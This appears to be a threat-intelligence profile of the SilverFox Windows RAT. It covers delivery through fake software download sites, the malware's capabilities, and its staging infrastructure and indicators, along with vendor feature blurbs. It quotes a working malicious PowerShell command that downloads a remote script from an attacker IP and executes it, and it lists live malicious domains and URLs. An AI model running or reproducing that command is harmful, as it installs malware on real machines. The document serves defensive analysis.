SilverFox is a China-focused Windows malware family commonly described in the provided reporting as a remote access trojan (RAT), with additional overlap to infostealer and Winos/Gh0stRAT-derived tooling. Public reporting cited here says it is actively used by cybercrime groups to target Chinese-speaking users, and that attack activity has intensified. Delivery has been observed through SEO-driven watering-hole and phishing sites masquerading as legitimate software download pages, trojanized software installers, office-software-themed packages, ZIP archives, and malicious LNK-based chains. Impersonated software and lures mentioned in the content include Feishu, ToDesk, Sunflower, Tencent Meeting, i4Tools, Chrome, Xiaohongshu, DeepL, AnyDesk, Snipaste, Facebook, Panasonic software, and Trend Micro Titanium, as well as Chinese-language disciplinary-investigation themed executables.
Capabilities described across the reporting include remote access functionality, staged payload retrieval, in-memory decryption and execution, shellcode loading, process injection and hollowing, DLL side-loading, persistence via Task Scheduler RPC and Windows services, Defender exclusion commands, Windows Update disablement, anti-analysis and anti-debugging checks, anti-VM checks, and security-tool awareness including references to 360 products. One analyzed chain reconstructed Alibaba OSS staging URLs at jun616[.]oss-cn-beijing[.]aliyuncs[.]com/tad and 26nn[.]oss-cn-hangzhou[.]aliyuncs[.]com/drops, downloaded carrier files named a.gif, b.gif, c.gif, d.gif, s.dat, s.jpg, drops.jpg, image.png, and thumbs.db, and ultimately decoded a stage exporting Edge from rundll32.dat that used HKCU\SOFTWARE\Sauron, copied itself to C:\Windows\svchost.exe, created a service named Sauron, and contained downloader templates hxxp://%s/upx.rar, hxxp://%s/%d.dll, and hxxp://%s/ip.txt. Another SilverFox variant used a custom virtual machine, ChaCha20/Salsa20-style encryption, encrypted resource blobs, and Microsoft RPC over ncacn_ip_tcp via NdrAsyncClientCall for C2, with the actual host and port remaining unrecovered in static analysis.
Infrastructure associated with SilverFox phishing and malware delivery in the provided content is extensive. Knownsec reported 2,639 phishing website records tied to 1,285 unique domains and 609 IPs, with heavy use of .top domains, centralized hosting, and Let’s Encrypt certificates. The originating phishing site discussed was fndykokouviqndzc[.]cn at 24[.]233[.]31[.]22, with JARM 27d27d27d00027d1dc27d27d27d27d6bb109f6a86ac53b95e602f9b6ac44ca and a related download URL at http://www[.]zsyglvocqxpubdzk[.]cn. Additional infrastructure and indicators mentioned include 156[.]251[.]25[.]112 hosting 292 phishing domains, the OSS hosts above, and a separate LNK campaign using 46.161.0.94 that ReversingLabs classified as Win32.Trojan.Sonbokli and that reporting said may be linked to SilverFox, though final payload confirmation was not available. Attribution in the supplied material is mixed: SilverFox is repeatedly described as Chinese-origin and China-focused, but some reporting explicitly leaves operator attribution unresolved and places parts of the activity more broadly in the SilverFox/Winos/Gh0stRAT ecosystem rather than tying it to a definitively identified actor.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
13 distinct techniques documented for this family, organized by ATT&CK tactic.
It's a single-IP SEO poisoning distribution hub running multiple thematic clusters... The software typosquat subcluster is the one worth staring at. The actor is impersonating a who's-who of desktop software across categories...
For twelve operationally-named domains to all land on the same registrant email without privacy — and for that email to be a personal gmail.com address rather than a burner — is an operator OPSEC failure of the kind that normally gets scrubbed before the first phishing sample ever leaves the author's workstation.
Initial Access Phishing: Spearphishing Attachment T1566.001 ZIP file containing malicious LNK
The actor is impersonating a who's-who of desktop software across categories ... Browsers Firefox, Edge, 360 Browser ... Messaging Telegram ... Security Huorong antivirus ... Hosting fake 'Qihoo 360 Security' download pages under a .icu TLD is low-effort social engineering that only needs to fool the subset of users who don't check domain suffixes carefully.
powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))
The name "360news" is a deliberate typosquat of Qihoo 360 (奇虎360), the largest Chinese cybersecurity vendor. Hosting fake "Qihoo 360 Security" download pages under a .icu TLD is low-effort social engineering...
Two suggestive names — jackadmin reads like a C2 admin panel hostname, jackbank reads like a banking trojan overlay / fraud panel hostname — repeated five times each as a pre-provisioned batch for when the previous set gets burned.
2,040 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A layered malware chain wrapped in a trojanized Panasonic host that reconstructs Alibaba OSS staging URLs, retrieves image-named encrypted carriers, performs signed DLL side-loading, uses RPC task scheduling, deploys AV-evasion/preparation logic, and ultimately reaches a late-stage backdoor component.
SilverFox is described as a Chinese-origin infostealer/RAT associated with trojanized software. In this campaign, the final trojanized chrome.exe payload may be a SilverFox variant.
A SilverFox RAT variant disguised as a Trend Micro Titanium installer. It hides logic inside a custom virtual machine with a binary search tree dispatcher, uses ChaCha20/Salsa20-style encryption for code and C2 payloads, performs anti-debugging and anti-VM checks, decrypts code in memory, injects into processes, and communicates with operators over Windows MSRPC using NdrAsyncClientCall.
SilverFox is an infostealer malware used by cybercrime groups to target Chinese-speaking users, stealing credentials and sensitive information.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.